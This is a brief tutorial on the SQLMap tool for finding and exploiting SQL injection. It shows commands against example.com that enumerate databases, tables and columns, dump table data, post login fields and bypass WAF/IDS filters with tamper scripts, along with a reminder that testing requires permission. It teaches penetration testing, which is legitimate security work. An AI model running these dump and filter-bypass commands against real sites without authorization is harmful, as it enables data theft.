SQL Injection with SQLMap #whitehat

SQLMap is a powerful and popular open-source tool used to detect and exploit SQL injection vulnerabilities.

Let's dive into a basic usage of SQLMap.


Linux Installation

sudo apt-get install sqlmap

Windows Installation


Basic Usage

In the terminal or command prompt. Run SQLMap with a target URL that is suspected of being vulnerable to SQL injection:

sqlmap -u "http://example.com/page?id=1"

Basic Options

  • -u URL, --url=URL: Specifies the URL to test.
  • --data: Specifies data for POST requests.
  • -p: Specifies the parameter to test (if the URL has multiple parameters).
  • --dbs: Enumerates databases.
  • -D: Specifies a database to use with other options (e.g., dump tables).
  • --tables: Enumerates tables in the specified database.
  • -T: Specifies a table to use with other options (e.g., dump columns).
  • --columns: Enumerates columns in the specified table.
  • --dump: Dumps the data from the specified table or columns.


Testing for Vulnerability.

sqlmap -u "http://example.com/page?id=1"

Enumerating Databases.

sqlmap -u "http://example.com/page?id=1" --dbs

Enumerating Tables in a Database.

sqlmap -u "http://example.com/page?id=1" -D database_name --tables

Enumerating Columns in a Table.

sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns

Dumping Data from a Table.

sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump

Advanced Usage

Posting Data.

sqlmap -u "http://example.com/login" --data="username=user&password=pass"

Specify Parameter to Test.

sqlmap -u "http://example.com/page?param1=1&param2=2" -p param1

Bypass WAF/IDS.

sqlmap -u "http://example.com/page?id=1" --tamper=space2comment


  • Always ensure you have permission to test the target
  • Use tamper scripts to bypass security filters (e.g., --tamper=space2comment)
  • Combine options for more comprehensive testing

For more detailed usage and advanced options, refer to the SQLMap official documentation.

How was the tutorial?

Love Discord?